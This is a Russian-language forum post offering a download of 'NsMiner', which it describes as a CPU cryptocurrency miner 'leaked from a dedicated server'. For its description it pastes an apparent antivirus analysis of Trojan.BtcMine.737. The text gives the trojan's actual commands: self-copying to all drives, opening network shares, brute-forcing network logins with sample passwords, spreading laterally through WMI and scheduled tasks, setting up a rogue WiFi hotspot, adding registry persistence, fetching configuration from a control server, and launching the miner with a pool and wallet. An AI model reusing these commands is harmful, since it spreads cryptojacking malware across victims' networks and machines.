NsMiner - прога лля майнинга на CPU

Ответов: 6
Статус
В этой теме нельзя размещать новые ответы.
NsMiner - прога лля майнинга на CPU. Слита с дедика

Описание (описание не моё, взято с другого источника):

Trojan.BtcMine.737 - троян, похищающий криптовалюту

Trojan.BtcMine.737 - троян, предназначенный для добычи (майнинга) криптовалют. Вредоносная программа состоит из трех упакованных друг в друга установщиков, созданных с использованием технологии Nullsoft Scriptable Install System (NSIS).

Первый установщик представляет собой дроппер, который пытается остановить процессы Trojan.BtcMine.737, при условии, что они уже были ранее запущены в системе:

cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe


Затем размещает и запускает собственные копии на диске атакуемого компьютера:

%TEMP%\Key.exe

после чего пытается удалить исходный файл:

cmd /c for %i in (1,1,900) do del "<полный путь к дропперу>"


Второй установщик, в первую очередь, сохраняет в папе

%APPDATA%\NsCpuCNMiner\

на диске атакованного компьютера и запускает исполняемый файл CNminer.exe, который в свою очередь представляет собой NSIS-установщик.

После этого он создает собственную копию в папке автозагрузки

%APPDATA%\%USERNAME%

с помощью команды:

cmd /c xcopy /y <своё имя> %COMMON_STARTUP% & xcopy /y /i <cвоё имя> %APPDATA%\%USERNAME%


К этой папке вредонос автоматически открывает доступ из локальной сети:

net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs


Сохраняет свою копию в папке «Документы» пользователя Windows:

"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"


Затем троянец копирует себя в корневую папку всех дисков инфицированной машины. Стоит сразу отметить, что эту операцию он повторяет с определенной периодичностью.:

cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\


В целевых папках данные копии вредоносной программы отображаются в виде файла с именем Key, и имеют значок WinRAR-архива.



Затем троянская программа перечисляет доступные в сетевом окружении компьютеры

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view

и пытается подключиться к ним, перебирая логины и пароли с использованием имеющегося в его распоряжении специального списка:

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
...


Кроме этого, вредоносная программа пытается подобрать пароль к локальной учетной записи пользователя Windows. Если данная операция ему удается, тогда Trojan.BtcMine.737 при наличии соответствующего оборудования запускает на инфицированном компьютере открытую точку доступа WiFi:

cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 &&
SchTasks /Run /TN WiFi /i


Если вредоносу удалось получить доступ к одному из компьютеров в локальной сети, тогда предпринимается попытка сохранить и запустить на нем копию трояна. При этом будет использоваться либо инструментарий Windows Management Instrumentation (WMI)

StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")

либо при помощи планировщика заданий:

Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f


Установщиком утилиты для добычи криптовалюты является программа CNminer.exe. Ее Trojan.BtcMine.737 сохраняет на диск на втором этапе своей установки. После запуска на инфицированном компьютере CNminer.exe сохраняет в текущей папке исполняемые файлы майнера для 32-разрядной и 64-разрядной архитектур, а помимо этого и текстовый файл с необходимыми для его работы конфигурационными данными:

  • NsCpuCNMiner32.exe;
  • NsCpuCNMiner64.exe;
  • pools.txt.


Ссылку на исполняемый файл троян вносит в отвечающую за автоматический запуск приложений ветвь системного реестра Windows. Кроме того, троянская программа сохраняет ярлык на него в стандартной папке автозапуска.:

WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer"
"$APPDATA\NsCpuCNMiner\CNminer.exe"
CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336


После старта установщика содержащийся в нем сценарий останавливает уже работающие процессы майнеров, при условии, что они были запущены ранее:

cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe


Затем он обращается к своему управляющему серверу, который возвращает ему в виде HTML-файла дополнительные конфигурационные данные с параметрами пулов и номерами электронных кошельков. Примечательно, но эти номера периодически меняются:

StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33]
"st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru"
StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0"
StrCpy $[35]
"43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgA
Bp"
...
Push kernel32::GetTickCount()i.r2
StrCpy $[32] "http://$[32]/test.html?$2"
...
Push $[32]
Push /TOSTACK
Push Mozilla/5.0 Gecko/20100101 Firefox/4.0
Push /USERAGENT
RegisterDLL $PLUGINSDIR\inetc.dll get 0
Sleep 942


Затем запускается сам майнер:

"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1
-o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899
K -p x

Скачать тут:

Для просмотра содержимого вам необходимо авторизоваться.
 
Статус
В этой теме нельзя размещать новые ответы.